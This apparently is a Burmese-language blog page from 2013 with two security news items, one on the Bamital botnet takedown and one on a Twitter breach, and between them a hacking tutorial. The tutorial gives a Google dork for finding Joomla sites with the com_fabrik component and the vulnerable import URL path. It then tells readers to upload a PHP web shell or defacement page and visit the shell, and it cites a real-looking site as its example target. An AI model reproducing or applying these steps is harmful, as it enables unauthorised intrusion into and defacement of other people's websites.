Microsoft နဲ့ Symantec တို့လို software ကုမ္ပဏီ အကြီးစား နှစ်ခုက ဆိုးသွမ်းတဲ့ cyber crime operation တွေကို ပိတ်ချဖို့ အတူတကွ ဆောင်ရွက်ကြမယ်လို့ Reuters ကလာတဲ့ သတင်းတွေက ဆိုပါတယ်။ Microsoft နဲ့ Symantec ကအမှန်တကယ်လည်း ကွန်ပြူတာပေါင်း မြောက်များစွာကို သူတို့ကို အသုံးပြုနေတဲ့ သူတွေ မသိအောင် နောက်ကွယ်က ထိန်းချုပ်နေတဲ့ ဆာဗာတစ်ချို့ကို ပိတ်ချ လိုက်ပါတယ်။

Cyber Crime

Bamital botnet လို့နာမည်ပေးထားတဲ့ တကယ့် အကြီးစား cyber crime operation ကအသုံးပြုသူတွေ ရှာဖွေထားတဲ့ အချက်အလက်တွေကို အဓိက ခိုးယူပြီးတော့ click လုပ်တဲ့ အကြိမ်ရေနဲ့ ကောက်ခံတဲ့ ကြော်ငြာ လုပ်ငန်းတွေ ဆီက မရိုးမသား ငွေကြေး ကောက်ခံတာ မျိုးတွေကို ပြုလုပ်ခဲ့ တာပါ။ ကမ္ဘာအနှံ့အပြားက ringleaders တွေက ၀က်ဘ်ဆိုဒ်တွေနဲ့ ဆာဗာတွေကို အမည်ဝှက်တွေ ပေးပြီး ရယူထားပြီးတော့ အသုံးပြုသူတွေရဲ့ ရှာဖွေထားတဲ့ အချက်အလက်တွေကို click တွေက တဆင့် သူတို့ အကျိုးအမြတ် ရနိုင်တဲ့ ၀က်ဘ်ဆိုဒ်တွေကို လမ်းကြောင်းပြောင်း ရယူလိုက် ပါတယ်။ ကျွမ်းကျင်သူ တွေက US federal marshalls ရဲ့အကူ အညီနဲ့ data center တွေကို ၀င်သိမ်းပြီး Netherlands တောက်လျှောက်က operators တွေကို ဆာဗာတွေကို ဖြုတ်ချဖို့ စည်းရုံးနိုင် ခဲ့ပါတယ်။ Microsoft နဲ့ Symantec တို့ရဲ့ ခန့်မှန်းချက်တွေ အရ ကွန်ပြုတာ အလုံးပေါင်း သုံးသိန်းနဲ့ ခြောက်သိန်း လောက်က Bamital botnet ကိုခေါ်ဆောင်သွားတဲ့ malware တွေရှိနေတယ်လို့ ဆိုပါတယ်။

Cyber Crime

ဆာဗာတွေကို ပိတ်ချတာဟာ ပြဿနာ ရှိနေတဲ့ ကွန်ပြူတာတွေကို ၀က်ဘ်ဆိုဒ်တွေကို အသုံးပြုရာက ခဏတာ တားဆီးပေး နိုင်မှာပါ။ ပြဿနာရှိတဲ့ ကွန်ပြူတာတွေကို "ဒီဝက်ဘ်ဆိုဒ် ထဲကို ရောက်လာတာဟာ သင့်ကွန်ပြူတာမှာ malware နဲ့ပတ်သက်တဲ့ ပြဿနာတွေ ရှိကောင်း ရှိနေတာကြောင့် ဖြစ်ပြီး ဒီ malware ကိုမရှင်းထုတ်မချင်း ဒီ notification ကိုလက်ခံ ရရှိနေဦးမှာပါ" ဆိုတဲ့ message တွေနဲ့ဒီ malware တွေကို ရှင်းထုတ်ဖို့ လိုအပ်တဲ့ tools တွေကိုလည်း အခမဲ့ ပို့ပေး နေပါပြီ။

Source - Gizmodo, Images from Gizmodo, Smh.com.au
credit :  MYMC

Wednesday, 6 February 2013

Joomla Component com_fabrik File Upload Vulnerability

Joomla Component com_fabrik File Upload Vulnerability

Joomla Hacking နောက်တနည်းပေါ့ ~ :D Joomla Hacking တွေအများကြီးရှိပါတယ်.. ရှာကြည့်ပေါ့ exploit တွေမှာ .. :D ခုဟာက ဒီထဲက တနည်းပါ ..

 Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik

ဒါကို Google ထဲမှာ၇ှာပြီး Vulnerability ဖြစ်တဲ့ link တွေ ကျလာပါလိမ့်မယ်.. ဒီထဲက တခု ရွေးလိုက်ပါ ..

ဥပမာ => http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85

ဒါဆို .. သူ့ အနောက်ကနေပြီး Vulnerable Path လိုက်ပေးပါ ..

Coad : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

E.g => http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 

ဒါဆို အောက်ကပြထားတဲ့ ပုံစံအတိုင်းလေးပေါ်လာပါလိမ့်မယ်..


(မပေါ်တဲ့ဟာတွေ၇ှိပါတယ် ။ မပေါ်၇င် Next One ပေါ့) :P

ပေါ်လာလို့ ရှိရင် ကိုယ့် File Upload လုပ်ပေးပါ ..
ဥပမာ => (liT2le.php , mhudeface.html)

အားလုံးပြီးပြီဆို ကိုယ့် Shell ကိုပြန်ကြည့်ရအောင် >>  http://www.liT2le_uNkn0w/media/yourshell.php

Monday, 4 February 2013

Twitter ၀က်ဘ်ဆိုက် ဝင်ရောက်တိုက်ခိုက်ခံရ


အင်တာနက်ပေါ်က Twitter လူမှုရေး ကွန်ယက်ဟာ ဒီသီတင်း ပတ်ထဲမှာ အဆင့်မြင့် နည်းပညာ သုံးပြီး ထိုးဖောက် ခံရလို့ Twitter အသုံးပြုသူ ၂ သိန်းခွဲရဲ့ အချက် အလက်တွေ ပေါက်ကြား သွားရ တယ်လို့ Twitter က ပြော ပါတယ်။ တရား မဝင် ခိုးဝင်ဖို့ မအောင်မြင်ဘဲ ကြိုးစား ထားတာတွေ ကို တွေ့ရှိခဲ့တယ်၊ ပြီးတော့ ထိုးဖောက်ဖို့ ကြိုးစားနေ တာကိုလည်း ကြုံလိုက်ပြီး အဲဒါကို ချက်ချင်းပဲ တားဆီး လိုက်နိုင် တယ်လို့ Twitter ရဲ့ လုံခြုံရေးဆိုင်ရာ ညွှန်ကြားရေးမှူး Bob Lord ကပြောပါတယ်။

Twitter က ကိုယ့်စာ မျက်နှာ ထိုးဖောက်ခံ ရသူတွေရဲ့ passwords တွေကို ပြန်ပြင် ဆင်ပြီင်္း သက်ဆိုင် သူတွေကို အကြောင်းကြားပေး ခဲ့တယ်လို့ ပြော ပါတယ်။ တရုတ်ရဲ့ internet တိုက်ခိုက် မှုနဲ့ ကြုံရ တယ်ဆိုတဲ့ New York Times နဲ့ Wall Street Journal သတင်းစာတွေလို twitter ကတော့ သူတို့ကိုဘယ်က တိုက်ခိုက် တယ်ဆိုတာ မပြောပါ ဘူး။ ဒါပေမဲ့ တိုက်ခိုက် ပုံက တကယ့် တတ်ကျွမ်းသူရဲ့ လက်ရာ မျိုးဖြစ်ပြီး အဲဒီဖြစ် ရပ်က တခု တည်းဖြစ်ရပ် မဟုတ်ဘူး လို့လည်း Bob Lord ပြောပါတယ်။

အခုတော့ Twitter ဟာ အစိုးရ တရားဥပဒေစိုးမိုးရေး အဖွဲ့တွေနဲ့ လက်တွဲပြီး အင်တာနက်လုံခြုံရေးအတွက် လုပ်ဆောင်နေပါ တယ်လို့ ပြောပါတယ်။ 

Source:  - VOA